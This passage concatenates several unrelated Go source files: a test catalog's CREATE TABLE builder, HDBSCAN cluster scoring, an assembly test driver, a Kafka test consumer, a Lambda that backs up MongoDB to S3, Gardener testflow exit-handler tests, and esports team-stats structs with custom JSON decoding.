	tbl     *cat.Table   // table under construction
}
// execute builds a cat.Table from the given CREATE TABLE statement by
// dispatching on each definition clause, registers the result in the
// catalog, and returns it. Unsupported clause types abort via unimplemented.
func (ct *createTable) execute(stmt *tree.CreateTable) *cat.Table {
	tn, err := stmt.Table.Normalize()
	if err != nil {
		fatalf("%s", err)
	}
	ct.tbl = &cat.Table{Name: cat.TableName(tn.Table())}
	for _, def := range stmt.Defs {
		switch def := def.(type) {
		case *tree.ColumnTableDef:
			ct.addColumn(def)
		case *tree.UniqueConstraintTableDef:
			ct.addUniqueConstraintKey(def)
		case *tree.IndexTableDef:
			ct.addIndexKey(def)
		case *tree.ForeignKeyConstraintTableDef:
			ct.addTableForeignKey(def)
		default:
			unimplemented("%T", def)
		}
	}
	// Add the new table to the catalog.
	ct.catalog.AddTable(ct.tbl)
	return ct.tbl
}
// addColumn appends a column to the table under construction, registering any
// inline UNIQUE/PRIMARY KEY constraint and any inline REFERENCES clause.
func (ct *createTable) addColumn(def *tree.ColumnTableDef) {
	// PRIMARY KEY implies NOT NULL.
	notNull := def.PrimaryKey || (def.Nullable.Nullability == tree.NotNull)
	typ := coltypes.CastTargetToDatumType(def.Type)
	col := cat.Column{Name: cat.ColumnName(def.Name), NotNull: notNull, Type: typ}
	ord := ct.tbl.AddColumn(&col)
	if def.Unique || def.PrimaryKey {
		key := ct.addKey(&cat.TableKey{
			Primary: def.PrimaryKey,
			Unique:  true,
			Columns: []cat.ColumnOrdinal{ord},
		})
		// Name anonymous keys conventionally.
		if key.Name == "" {
			if def.PrimaryKey {
				key.Name = "primary"
			} else {
				key.Name = string(def.Name) + "_idx"
			}
		}
	}
	if def.HasFKConstraint() {
		refTable, err := def.References.Table.Normalize()
		if err != nil {
			fatalf("%s", err)
		}
		ref := ct.catalog.Table(cat.TableName(refTable.Table()))
		var refCols []cat.ColumnOrdinal
		if def.References.Col != "" {
			// An explicit referenced column was named.
			refCols = []cat.ColumnOrdinal{ref.ColumnOrdinal(cat.ColumnName(def.References.Col))}
		} else {
			// No column named: default to the referenced table's primary key.
			for _, key := range ref.Keys {
				if key.Primary {
					refCols = key.Columns
					break
				}
			}
			if refCols == nil {
				fatalf("%s does not contain a primary key", ref.Name)
			}
		}
		ct.addForeignKey(ref, []cat.ColumnOrdinal{ord}, refCols)
	}
}
// addUniqueConstraintKey registers a table-level UNIQUE or PRIMARY KEY
// constraint. A primary key also forces all of its columns to NOT NULL.
func (ct *createTable) addUniqueConstraintKey(def *tree.UniqueConstraintTableDef) {
	cols := ct.extractColumns(&def.IndexTableDef)
	if def.PrimaryKey {
		for _, i := range cols {
			ct.tbl.Columns[i].NotNull = true
		}
	}
	key := ct.addKey(&cat.TableKey{
		Primary: def.PrimaryKey,
		Unique:  true,
		Columns: cols,
	})
	// Name anonymous keys; an unnamed primary key becomes "primary".
	if key.Name == "" {
		key.Name = string(def.Name)
		if key.Name == "" {
			key.Name = "primary"
		}
	}
}
// addIndexKey registers a secondary index defined at the table level.
// NOTE(review): the index is marked Unique even for a plain INDEX clause —
// confirm this is intended.
func (ct *createTable) addIndexKey(def *tree.IndexTableDef) {
	tblKey := &cat.TableKey{
		Unique:  true,
		Columns: ct.extractColumns(def),
	}
	key := ct.addKey(tblKey)
	if len(key.Name) == 0 {
		key.Name = string(def.Name)
	}
}
// addTableForeignKey registers a table-level FOREIGN KEY constraint. When no
// referenced columns are listed, the referenced table's primary key is used.
func (ct *createTable) addTableForeignKey(def *tree.ForeignKeyConstraintTableDef) {
	refTable, err := def.Table.Normalize()
	if err != nil {
		fatalf("%s", err)
	}
	ref := ct.catalog.Table(cat.TableName(refTable.Table()))
	var toCols []cat.ColumnOrdinal
	if len(def.ToCols) == 0 {
		// Default to the referenced table's primary key columns.
		for _, key := range ref.Keys {
			if key.Primary {
				toCols = key.Columns
				break
			}
		}
		if toCols == nil {
			fatalf("%s does not contain a primary key", ref.Name)
		}
	} else {
		toCols = extractNames(ref, def.ToCols)
	}
	// Source and target column lists must be the same length.
	if len(def.FromCols) != len(toCols) {
		fatalf("invalid foreign key specification: %s(%s) -> %s(%s)",
			ct.tbl.Name, def.FromCols, ref.Name, def.ToCols)
	}
	ct.addForeignKey(ref, extractNames(ct.tbl, def.FromCols), toCols)
}
// addKey adds key to the table, or — when a key over the same column set
// already exists — merges key's flags into the existing one and returns it.
// For a genuinely new key, NotNull is derived from the NOT NULL status of
// every member column.
func (ct *createTable) addKey(key *cat.TableKey) *cat.TableKey {
	existing := ct.getKey(key)
	if existing != nil {
		// Same column set already registered: only strengthen its flags.
		existing.Primary = existing.Primary || key.Primary
		existing.Unique = existing.Unique || key.Unique
		existing.NotNull = existing.NotNull || key.NotNull
		return existing
	}
	// The key is NOT NULL only if all of its columns are.
	key.NotNull = true
	for _, i := range key.Columns {
		key.NotNull = key.NotNull && ct.tbl.Columns[i].NotNull
	}
	return ct.tbl.AddKey(key)
}
// getKey returns the table's existing key covering the same column set as
// key, or nil when there is none.
func (ct *createTable) getKey(key *cat.TableKey) *cat.TableKey {
	for i := 0; i < len(ct.tbl.Keys); i++ {
		if ct.tbl.Keys[i].EqualColumns(key) {
			return &ct.tbl.Keys[i]
		}
	}
	return nil
}
// addForeignKey attaches a foreign key from srcColumns of the table under
// construction to dstColumns of dst. The source column set is registered as
// a key first; at most one foreign key may exist per source key.
func (ct *createTable) addForeignKey(dst *cat.Table, srcColumns, dstColumns []cat.ColumnOrdinal) {
	srcKey := ct.addKey(&cat.TableKey{Columns: srcColumns})
	if srcKey.Fkey != nil {
		fatalf("foreign key already defined for %d", srcColumns)
	}
	srcKey.Fkey = &cat.ForeignKey{
		Referenced: dst,
		Columns:    dstColumns,
	}
}
// extractColumns resolves the column names of an index definition to their
// ordinals within the table under construction.
func (ct *createTable) extractColumns(def *tree.IndexTableDef) []cat.ColumnOrdinal {
	ordinals := make([]cat.ColumnOrdinal, 0, len(def.Columns))
	for _, col := range def.Columns {
		ordinals = append(ordinals, ct.tbl.ColumnOrdinal(cat.ColumnName(col.Column)))
	}
	return ordinals
}
// extractNames resolves a list of column names to their ordinals within tbl.
func extractNames(tbl *cat.Table, names tree.NameList) []cat.ColumnOrdinal {
	ordinals := make([]cat.ColumnOrdinal, 0, len(names))
	for _, name := range names {
		ordinals = append(ordinals, tbl.ColumnOrdinal(cat.ColumnName(name)))
	}
	return ordinals
}
|
// Copyright 2020 Humility AI Incorporated, All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package hdbscan
// scoreClusters assigns a score to every cluster using the requested
// optimization strategy; anything other than VarianceScore falls back to
// stability scoring.
func (c *Clustering) scoreClusters(optimization string) {
	if optimization == VarianceScore {
		c.varianceScores()
		return
	}
	c.stabilityScores()
}
// varianceScores scores clusters via size/variance: sizes and variances are
// computed first, then combined into a score per cluster. The call order
// matters — setVarianceScores reads what the two setters store.
func (c *Clustering) varianceScores() {
	c.setNormalizedSizes()
	c.setNormalizedVariances()
	c.Clusters.setVarianceScores()
}
// setVarianceScores sets each cluster's score to size/variance, so larger,
// tighter clusters score higher.
// NOTE(review): a zero variance yields +Inf (or NaN when size is also 0) —
// confirm upstream guarantees variance > 0.
func (c clusters) setVarianceScores() {
	for _, cluster := range c {
		cluster.score = cluster.size / cluster.variance
	}
}
// setNormalizedSizes records each cluster's size (its number of points).
//
// NOTE(review): despite the name, no normalization is performed — the raw
// point count is stored. The previous implementation also accumulated all
// sizes into a local slice that was never used; that dead code is removed.
func (c *Clustering) setNormalizedSizes() {
	for _, cluster := range c.Clusters {
		cluster.size = float64(len(cluster.Points))
	}
}
// setNormalizedVariances computes and stores the generalized variance of
// each cluster's point data.
//
// NOTE(review): despite the name, no normalization is performed. The
// previous implementation also accumulated all variances into a local slice
// that was never used; that dead code is removed.
func (c *Clustering) setNormalizedVariances() {
	for _, cluster := range c.Clusters {
		// Gather the raw data rows belonging to this cluster.
		var clusterData [][]float64
		for _, pointIndex := range cluster.Points {
			clusterData = append(clusterData, c.data[pointIndex])
		}
		// Guard against an empty cluster: indexing clusterData[0] below
		// would panic. The cluster's variance keeps its zero value.
		if len(clusterData) == 0 {
			continue
		}
		variance := GeneralizedVariance(len(cluster.Points), len(clusterData[0]), unfold(clusterData))
		cluster.variance = isNum(variance)
	}
}
// stabilityScores is the default scoring strategy; it is not yet implemented
// and currently leaves all cluster scores untouched.
func (c *Clustering) stabilityScores() {
	// TODO: implement
}
// calculateStability returns the cluster's stability. The computation is
// unfinished: a cluster with points currently just returns its existing
// score, and the child-cluster aggregation below is stubbed out.
func (c *cluster) calculateStability() float64 {
	if len(c.Points) > 0 {
		// var sum float64
		// for _, pIndex := range c.points {
		// }
		// calculate sum of points (1 / e_min) - (1 / e_max)
		// e_min = points mrg
		return c.score
	}
	var stability float64
	// for _, childCluster := range c.children {
	// childStability := childCluster.calculateStability(mrg)
	// stability += childStability
	// }
	return stability
}
// potentialStability is an unimplemented stub for the cluster-tree stability
// rule sketched below; it always returns 0.
func potentialStability(c *cluster) float64 {
	// if leaf node: return stability
	// else: return max(stability, sum-of-children-stabilities)
	return 0
}
|
package main
import (
"fmt"
"sync"
)
// The following routines are implemented in assembly (no Go bodies).
// Original comments translated from Chinese.
func return_tls() int64
func return_g() int64
func baseadd(x, y int64) int64 // use of a global variable
func getg() uint64
func address(pi *int) int // dereference the pi pointer and return its value
func t_fp_sp() (int64, int64) // relationship between fp and sp
func t_for(a int64) int64 // an implementation of a for loop
func t_fp_bp() (int64, int64) // relative relationship between fp and bp
func t_moveups(in1, int2 int64) (out1, out2 int64) // test the MOVUPS instruction, which moves 128 bits at a time
//
func t_fp_vsp_sp() (r_fp, r_vsp, r_sp uint64) // test the relationship between fp, vsp and sp when the stack size is 0
func t_fp_vsp_sp_stack_16() (r_fp, r_vsp, r_sp uint64) // test the relationship between fp, vsp and sp when the stack size is 16
//
func inside(in1 int64) (r1 int64) // implement r1 = in1 + 1
func outside(in1 int64) (r1 int64) // return r1 = inside(in1)
//
// whichCallOutside runs the assembly routine outside and prints whether its
// result equals in1+1 (it should print true).
func whichCallOutside(in1 int64) {
	got := outside(in1)
	ok := in1+1 == got
	fmt.Printf("-----%v, outside,re1:%v\n", in1, ok) // should print true
}
// main launches five concurrent testprint runs and waits for all of them.
func main() {
	var wg sync.WaitGroup
	for i := 0; i < 5; i++ {
		wg.Add(1)
		go testprint(&wg, i)
	}
	wg.Wait()
}
// testprint exercises each assembly routine once and prints its results,
// tagging every line with the goroutine's index a.
func testprint(wg *sync.WaitGroup, a int) {
	// Done is deferred so the WaitGroup is released even if a routine
	// panics; previously it was the final statement, so a panic would make
	// main's wg.Wait() hang forever.
	defer wg.Done()
	fmt.Printf("-----%v, tls,%x\n", a, return_tls())
	fmt.Printf("-----%v, g,%x\n", a, return_g())
	{
		h, y := t_fp_sp()
		fmt.Printf("-----%v, t_fp_sp,%x, %x\n", a, h, y)
	}
	{
		h := t_for(int64(a))
		fmt.Printf("-----%v, t_for, %x\n", a, h)
	}
	{
		h, y := t_fp_bp()
		fmt.Printf("-----%v, t_fp_bp,%x, %x\n", a, h, y)
	}
	{
		h, y := t_moveups(123, 321)
		fmt.Printf("-----%v, t_moveups,%v, %v\n", a, h, y)
	}
	{
		fp, vsp, sp := t_fp_vsp_sp()
		fmt.Printf("-----%v, t_fp_vsp_sp,fp:%x vsp:%x sp:%x\n", a, fp, vsp, sp)
	}
	{
		fp, vsp, sp := t_fp_vsp_sp_stack_16()
		fmt.Printf("-----%v, t_fp_vsp_sp_stack_16,fp:%x vsp:%x sp:%x\n", a, fp, vsp, sp)
	}
	{
		whichCallOutside(int64(a))
	}
}
|
package pipa
import "github.com/Shopify/sarama"
// --------------------------------------------------------------------
var _ Consumer = &testConsumer{} // compile-time check that testConsumer satisfies Consumer
// testConsumer is an in-memory Consumer for tests, backed by a pre-filled,
// already-closed channel of canned messages.
type testConsumer struct {
	messages chan *sarama.ConsumerMessage // canned messages, channel closed after filling
	lastMark *sarama.ConsumerMessage      // last message passed to MarkOffset
}
// newTestConsumer builds a testConsumer whose Messages channel is pre-filled
// with pointers to copies of the given messages and then closed.
func newTestConsumer(messages ...sarama.ConsumerMessage) *testConsumer {
	mch := make(chan *sarama.ConsumerMessage, len(messages))
	for _, msg := range messages {
		msg := msg // copy so each element gets its own address
		mch <- &msg
	}
	close(mch)
	return &testConsumer{messages: mch}
}
// Messages returns the pre-filled (and already closed) message channel.
func (c *testConsumer) Messages() <-chan *sarama.ConsumerMessage { return c.messages }
// MarkOffset records the last marked message so tests can inspect it.
func (c *testConsumer) MarkOffset(m *sarama.ConsumerMessage, _ string) { c.lastMark = m }
// Close is a no-op.
func (c *testConsumer) Close() error { return nil }
|
package main
import (
"errors"
"fmt"
"os"
"time"
"github.com/aws/aws-lambda-go/lambda"
"gopkg.in/pipe.v2"
)
// runBackup dumps a MongoDB database with mongodump and streams the archive
// straight into an S3 bucket via the aws CLI. It is the Lambda handler.
//
// Configuration is taken entirely from the environment: FILENAME, BUCKETNAME,
// MONGOHOST, MONGOUSERNAME, MONGOPW, AUTHDB and BACKUPDB. It returns a
// human-readable status message, or an error when configuration is missing
// or either command fails.
func runBackup() (string, error) {
	// Extend PATH so Lambda can call the executables bundled with the task.
	os.Setenv("PATH", os.Getenv("PATH")+":"+os.Getenv("LAMBDA_TASK_ROOT"))
	// Read configuration from the environment.
	baseName := os.Getenv("FILENAME")
	bucketName := os.Getenv("BUCKETNAME")
	mongoHost := os.Getenv("MONGOHOST")
	mongoUsername := os.Getenv("MONGOUSERNAME")
	mongoPW := os.Getenv("MONGOPW")
	authDB := os.Getenv("AUTHDB")
	backupDB := os.Getenv("BACKUPDB")
	// Validate required configuration. FILENAME is checked before the
	// timestamp suffix is appended — the previous code appended first, so
	// its emptiness check could never fail.
	for _, v := range []struct{ name, value string }{
		{"FILENAME", baseName},
		{"BUCKETNAME", bucketName},
		{"MONGOHOST", mongoHost},
		{"MONGOUSERNAME", mongoUsername},
		{"MONGOPW", mongoPW},
		{"AUTHDB", authDB},
		{"BACKUPDB", backupDB},
	} {
		if v.value == "" {
			return "", errors.New("No " + v.name + " Env Var")
		}
	}
	fileName := baseName + "-" + time.Now().Format("20060102150405")
	// mongodump writes the archive to stdout (--archive with no path).
	cmd1Name := "mongodump"
	cmd1Args := []string{
		"--host",
		mongoHost,
		"--ssl",
		"--username",
		mongoUsername,
		"--password",
		mongoPW,
		"--authenticationDatabase",
		authDB,
		"--db",
		backupDB,
		"--archive"}
	// The aws CLI reads the archive from stdin ("-") and uploads it to S3.
	cmd2Name := "aws"
	cmd2Args := []string{
		"s3",
		"cp",
		"-",
		"s3://" + bucketName + "/" + fileName}
	// Pipe mongodump's stdout into the aws upload.
	p := pipe.Line(
		pipe.Exec(cmd1Name, cmd1Args...),
		pipe.Exec(cmd2Name, cmd2Args...),
	)
	// Run the pipe and report its combined output.
	output, err := pipe.CombinedOutput(p)
	fmt.Printf("%s", output)
	if err != nil {
		fmt.Printf("%v\n", err)
		// Bug fix: the previous code returned the literal string "%v\n"
		// here instead of an empty message.
		return "", err
	}
	fmt.Println("Successfully uploaded to S3")
	return "Backup Run Successfully", nil
}
// main registers runBackup as the AWS Lambda handler.
func main() {
	lambda.Start(runBackup)
}
|
// Copyright 2019 Copyright (c) 2019 SAP SE or an SAP affiliate company. All rights reserved. This file is licensed under the Apache Software License, v. 2 except as noted otherwise in the LICENSE file.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package testflow_test
import (
"context"
"strings"
argov1 "github.com/argoproj/argo/v2/pkg/apis/workflow/v1alpha1"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
"github.com/gardener/test-infra/pkg/testmachinery"
tmv1beta1 "github.com/gardener/test-infra/pkg/apis/testmachinery/v1beta1"
"github.com/gardener/test-infra/test/resources"
"github.com/gardener/test-infra/test/utils"
)
// Integration tests for the onExit handler and for propagation of the
// testmachinery phase into the default and onExit flows. Relies on the
// suite-level `operation` helper and `TestrunDurationTimeout`.
var _ = Describe("testflow exit tests", func() {
	Context("onExit", func() {
		// NOTE(review): the title says "should not run", yet the assertion
		// below expects exactly one executed exit-handler step — confirm
		// which of the two is intended.
		It("should not run ExitHandlerTestDef when testflow succeeds", func() {
			ctx := context.Background()
			// NOTE(review): ctx.Done() only returns the channel; deferring
			// it does not cancel anything.
			defer ctx.Done()
			tr := resources.GetTestrunWithExitHandler(resources.GetBasicTestrun(operation.TestNamespace(), operation.Commit()), tmv1beta1.ConditionTypeSuccess)
			tr, wf, err := operation.RunTestrunUntilCompleted(ctx, tr, argov1.NodeSucceeded, TestrunDurationTimeout)
			defer utils.DeleteTestrun(operation.Client(), tr)
			Expect(err).ToNot(HaveOccurred())
			// Count exit-handler steps that completed successfully.
			numExecutedTestDefs := 0
			for _, node := range wf.Status.Nodes {
				if strings.HasPrefix(node.TemplateName, "exit-handler-testdef") && node.Phase == argov1.NodeSucceeded {
					numExecutedTestDefs++
				}
			}
			Expect(numExecutedTestDefs).To(Equal(1), "Testrun: %s", tr.Name)
		})
		// NOTE(review): this title duplicates the previous It, but the exit
		// handler here is bound to ConditionTypeError — the title probably
		// meant to mention the error-condition handler.
		It("should not run exit-handler-testdef when testflow succeeds", func() {
			ctx := context.Background()
			defer ctx.Done()
			tr := resources.GetTestrunWithExitHandler(resources.GetBasicTestrun(operation.TestNamespace(), operation.Commit()), tmv1beta1.ConditionTypeError)
			tr, wf, err := operation.RunTestrunUntilCompleted(ctx, tr, argov1.NodeSucceeded, TestrunDurationTimeout)
			defer utils.DeleteTestrun(operation.Client(), tr)
			Expect(err).ToNot(HaveOccurred())
			// No exit-handler step may have left the Skipped phase.
			numExecutedTestDefs := 0
			for _, node := range wf.Status.Nodes {
				if strings.HasPrefix(node.TemplateName, "exit-handler-testdef") && node.Phase != argov1.NodeSkipped {
					numExecutedTestDefs++
				}
			}
			Expect(numExecutedTestDefs).To(Equal(0), "Testrun: %s", tr.Name)
		})
		It("should run exit-handler-testdef when testflow fails", func() {
			ctx := context.Background()
			defer ctx.Done()
			tr := resources.GetTestrunWithExitHandler(resources.GetFailingTestrun(operation.TestNamespace(), operation.Commit()), tmv1beta1.ConditionTypeError)
			tr, wf, err := operation.RunTestrunUntilCompleted(ctx, tr, argov1.NodeFailed, TestrunDurationTimeout)
			defer utils.DeleteTestrun(operation.Client(), tr)
			Expect(err).ToNot(HaveOccurred())
			// Exactly one exit-handler step must have run on failure.
			numExecutedTestDefs := 0
			for _, node := range wf.Status.Nodes {
				if strings.HasPrefix(node.TemplateName, "exit-handler-testdef") && node.Phase != argov1.NodeSkipped {
					numExecutedTestDefs++
				}
			}
			Expect(numExecutedTestDefs).To(Equal(1), "Testrun: %s", tr.Name)
		})
	})
	Context("phase", func() {
		It("testmachinery phase should be propagated to default and onExit testflow with its right values", func() {
			ctx := context.Background()
			defer ctx.Done()
			tr := resources.GetBasicTestrun(operation.TestNamespace(), operation.Commit())
			// The default flow must observe the "running" phase...
			tr.Spec.TestFlow = tmv1beta1.TestFlow{
				{
					Name: "int-test",
					Definition: tmv1beta1.StepDefinition{
						Name: "check-dynamic-envvar-testdef",
						Config: []tmv1beta1.ConfigElement{
							{
								Type:  tmv1beta1.ConfigTypeEnv,
								Name:  "ENV_NAME",
								Value: testmachinery.TM_PHASE_NAME,
							},
							{
								Type:  tmv1beta1.ConfigTypeEnv,
								Name:  "ENV_VALUE",
								Value: string(testmachinery.PhaseRunning),
							},
						},
					},
				},
			}
			// ...while the onExit flow must observe the "exit" phase.
			tr.Spec.OnExit = tmv1beta1.TestFlow{
				{
					Name: "int-test",
					Definition: tmv1beta1.StepDefinition{
						Name: "check-dynamic-envvar-testdef",
						Config: []tmv1beta1.ConfigElement{
							{
								Type:  tmv1beta1.ConfigTypeEnv,
								Name:  "ENV_NAME",
								Value: testmachinery.TM_PHASE_NAME,
							},
							{
								Type:  tmv1beta1.ConfigTypeEnv,
								Name:  "ENV_VALUE",
								Value: string(testmachinery.PhaseExit),
							},
						},
					},
				},
			}
			tr, _, err := operation.RunTestrunUntilCompleted(ctx, tr, argov1.NodeSucceeded, TestrunDurationTimeout)
			defer utils.DeleteTestrun(operation.Client(), tr)
			Expect(err).ToNot(HaveOccurred())
		})
	})
})
|
package structs
import (
"encoding/json"
)
// TeamStats holds performance statistics about a particular Team.
type TeamStats struct {
	// Streak holds streak data at series and match granularity.
	Streak struct {
		Series struct {
			StreakScope // defined in stats.go
		} `json:"series,omitempty"`
		Match struct {
			StreakScope // defined in stats.go
		} `json:"match,omitempty"`
	} `json:"streak,omitempty"`
	// Winrate holds win-rate data at series and match granularity.
	Winrate struct {
		Series struct {
			WinrateSeriesScope // defined in stats.go
		} `json:"series,omitempty"`
		Match struct {
			WinrateMatchScope // defined in stats.go
		} `json:"match,omitempty"`
	} `json:"winrate,omitempty"`
	// Nemesis pairs an opposing team with loss counts (presumably the most
	// lost-to opponent — confirm against the API docs). Nil when absent.
	Nemesis *struct {
		Series struct {
			Competitor Team  `json:"competitor,omitempty"` // defined in stats.go
			Losses     int64 `json:"losses"`
		} `json:"series,omitempty"`
		Match struct {
			Competitor Team  `json:"competitor,omitempty"` // defined in stats.go
			Losses     int64 `json:"losses"`
		} `json:"match,omitempty"`
	} `json:"nemesis,omitempty"`
	// Dominating pairs an opposing team with win counts (presumably the most
	// beaten opponent — confirm against the API docs). Nil when absent.
	Dominating *struct {
		Series struct {
			Competitor Team  `json:"competitor,omitempty"` // defined in stats.go
			Wins       int64 `json:"wins"`
		} `json:"series,omitempty"`
		Match struct {
			Competitor Team  `json:"competitor,omitempty"` // defined in stats.go
			Wins       int64 `json:"wins"`
		} `json:"match,omitempty"`
	} `json:"dominating,omitempty"`
	// PlayByPlay holds the game-specific payload; its concrete type is chosen
	// in UnmarshalJSON (DotaTeamStats, LolTeamStats or CsTeamStats).
	PlayByPlay TeamPlayByPlayStats `json:"play_by_play"`
}
// TeamPlayByPlayStats is a placeholder for the game-specific play-by-play
// payload; the concrete type is selected in TeamStats.UnmarshalJSON.
type TeamPlayByPlayStats interface{}
// teamStats is an alias used to decode TeamStats without recursing back
// into its custom UnmarshalJSON.
type teamStats TeamStats
// UnmarshalJSON implements json.Unmarshaler for TeamStats.
//
// The "play_by_play" value has a game-specific shape, so it is split off
// first: the remaining keys are decoded through the teamStats alias (which
// avoids recursing back into this method), then the play-by-play payload is
// decoded into the game-specific struct identified by its distinguishing
// top-level key.
func (t *TeamStats) UnmarshalJSON(data []byte) error {
	var partial map[string]json.RawMessage
	if err := json.Unmarshal(data, &partial); err != nil {
		return err
	}
	pbpData := partial["play_by_play"]
	// Re-marshal everything except "play_by_play".
	// This seems to be faster than not doing it.
	delete(partial, "play_by_play")
	trimmed, err := json.Marshal(partial)
	if err != nil {
		// Bug fix: this error used to be silently discarded.
		return err
	}
	var tt teamStats
	if err := json.Unmarshal(trimmed, &tt); err != nil {
		return err
	}
	// Bug fix: a document without a "play_by_play" key is valid — leave
	// PlayByPlay nil. Previously this fell through to
	// json.Unmarshal(nil, ...) and failed with "unexpected end of JSON input".
	if len(pbpData) == 0 {
		*t = TeamStats(tt)
		return nil
	}
	// Inspect the top-level keys of the play-by-play object to detect the game.
	var pbpMap map[string]json.RawMessage
	if err := json.Unmarshal(pbpData, &pbpMap); err != nil {
		return err
	}
	// Dota is identified by "faction_stats".
	if _, ok := pbpMap["faction_stats"]; ok {
		var tmp DotaTeamStats
		if err := json.Unmarshal(pbpData, &tmp); err != nil {
			return err
		}
		tt.PlayByPlay = tmp
	}
	// LoL is identified by "side_stats".
	if _, ok := pbpMap["side_stats"]; ok {
		var tmp LolTeamStats
		if err := json.Unmarshal(pbpData, &tmp); err != nil {
			return err
		}
		tt.PlayByPlay = tmp
	}
	// CS is identified by "totals".
	if _, ok := pbpMap["totals"]; ok {
		var tmp CsTeamStats
		if err := json.Unmarshal(pbpData, &tmp); err != nil {
			return err
		}
		tt.PlayByPlay = tmp
	}
	*t = TeamStats(tt)
	return nil
}
// CsTeamStats holds data about a team play by play stats for cs
type CsTeamStats struct {
	// Totals aggregates kills/deaths plus the common per-side round stats.
	Totals struct {
		Kills  int64 `json:"kills"`
		Deaths int64 `json:"deaths"`
		CsTeamCommonStats
	} `json:"totals"`
	// Maps holds the common stats broken down per map.
	Maps []struct {
		Map Map `json:"map"`
		CsTeamCommonStats
	} `json:"maps"`
	Marksman []struct {
		PlayerId int64   `json:"player_id"`
		Adr      float64 `json:"adr"`
		Weapon   Weapon  `json:"weapon"`
	} `json:"marksman"`
	// TopStats holds the best single-player performances per category.
	TopStats struct {
		Kills struct {
			PlayerAgainst
			Kills int64 `json:"kills"`
		} `json:"kills"`
		Adr struct {
			PlayerAgainst
			Adr float64 `json:"adr"`
		} `json:"adr"`
		Assists struct {
			PlayerAgainst
			Assists int64 `json:"assists"`
		} `json:"assists"`
		Plants struct {
			PlayerAgainst
			Plants int64 `json:"plants"`
		} `json:"plants"`
		Defuses struct {
			PlayerAgainst
			Defuses int64 `json:"defuses"`
		} `json:"defuses"`
	} `json:"top_stats"`
	// TopMatches holds notable matches by round count.
	TopMatches struct {
		BiggestLoss struct {
			TeamAgainst
			Rounds int64 `json:"rounds"`
		} `json:"biggest_loss"`
		BiggestWin struct {
			TeamAgainst
			Rounds int64 `json:"rounds"`
		} `json:"biggest_win"`
		MostRounds struct {
			TeamAgainst
			Rounds int64 `json:"rounds"`
		} `json:"most_rounds"`
	} `json:"top_matches"`
}
// CsTeamCommonStats holds information common to multiple JSON objects.
type CsTeamCommonStats struct {
	NrMatches      int64   `json:"nr_matches"`
	CtRounds       int64   `json:"ct_rounds"`
	CtWins         int64   `json:"ct_wins"`
	TRounds        int64   `json:"t_rounds"`
	TWins          int64   `json:"t_wins"`
	PistolRounds   int64   `json:"pistol_rounds"`
	PistolWins     int64   `json:"pistol_wins"`
	FirstKillRate  float64 `json:"first_kill_rate"`
	FirstDeathRate float64 `json:"first_death_rate"`
}
// DotaTeamStats holds data about a teams play by play stats for dota
type DotaTeamStats struct {
	// FactionStats splits matches/wins per starting faction.
	FactionStats struct {
		Radiant struct {
			Matches int64 `json:"matches"`
			Wins    int64 `json:"wins"`
		} `json:"radiant"`
		Dire struct {
			Matches int64 `json:"matches"`
			Wins    int64 `json:"wins"`
		} `json:"dire"`
	} `json:"faction_stats"`
	// Drafts holds pick/ban frequency for this team and its opponents.
	Drafts struct {
		Own struct {
			MostPicked []DotaHeroWithWins `json:"most_picked"`
			MostBanned []DotaHeroWithWins `json:"most_banned"`
		} `json:"own"`
		Opponents struct {
			MostPicked []DotaHeroWithWins `json:"most_picked"`
			MostBanned []DotaHeroWithWins `json:"most_banned"`
		} `json:"opponents"`
	} `json:"drafts"`
	// TopStats holds the best single-player performances per category.
	TopStats struct {
		Kills struct {
			DotaPlayerAgainst
			Kills int64 `json:"kills"`
		} `json:"kills"`
		Gpm struct {
			DotaPlayerAgainst
			Gpm float64 `json:"gpm"`
		} `json:"gpm"`
		Xpm struct {
			DotaPlayerAgainst
			Xpm float64 `json:"xpm"`
		} `json:"xpm"`
		DmgGiven struct {
			DotaPlayerAgainst
			DmgGiven float64 `json:"dmg_given"`
		} `json:"dmg_given"`
		CreepKills struct {
			DotaPlayerAgainst
			LastHits int64 `json:"last_hits"`
		} `json:"creep_kills"`
		CreepDenies struct {
			DotaPlayerAgainst
			Denies int64 `json:"denies"`
		} `json:"creep_denies"`
	} `json:"top_stats"`
	// TopMatches holds notable matches by length and kills per minute.
	TopMatches struct {
		AvgLength float64 `json:"avg_length"`
		Longest   struct {
			Won struct {
				TeamAgainst
				Length int64 `json:"length"`
			} `json:"won"`
			Lost struct {
				TeamAgainst
				Length int64 `json:"length"`
			} `json:"lost"`
		} `json:"longest"`
		Shortest struct {
			Won struct {
				TeamAgainst
				Length int64 `json:"length"`
			} `json:"won"`
			Lost struct {
				TeamAgainst
				Length int64 `json:"length"`
			} `json:"lost"`
		} `json:"shortest"`
		AvgKpm float64 `json:"avg_kpm"`
		Kpm    struct {
			Highest struct {
				Kpm float64 `json:"kpm"`
				TeamAgainst
			} `json:"highest"`
			Lowest struct {
				Kpm float64 `json:"kpm"`
				TeamAgainst
			} `json:"lowest"`
		} `json:"kpm"`
	} `json:"top_matches"`
	// Average holds per-match averages; pointers distinguish absent values.
	Average struct {
		Match struct {
			Kills   *float64 `json:"kills"`
			Deaths  *float64 `json:"deaths"`
			Assists *float64 `json:"assists"`
			Gpm     *float64 `json:"gpm"`
			Xpm     *float64 `json:"xpm"`
			Length  *float64 `json:"length"`
			Wards   struct {
				Observers struct {
					Killed *float64 `json:"killed"`
					Placed *float64 `json:"placed"`
				} `json:"observers"`
				Sentries struct {
					Killed *float64 `json:"killed"`
					Placed *float64 `json:"placed"`
				} `json:"sentries"`
			} `json:"wards"`
			Structures struct {
				Towers struct {
					Taken  *float64 `json:"taken"`
					Lost   *float64 `json:"lost"`
					Denied *float64 `json:"denied"`
				} `json:"towers"`
				Barracks struct {
					Taken  *float64 `json:"taken"`
					Lost   *float64 `json:"lost"`
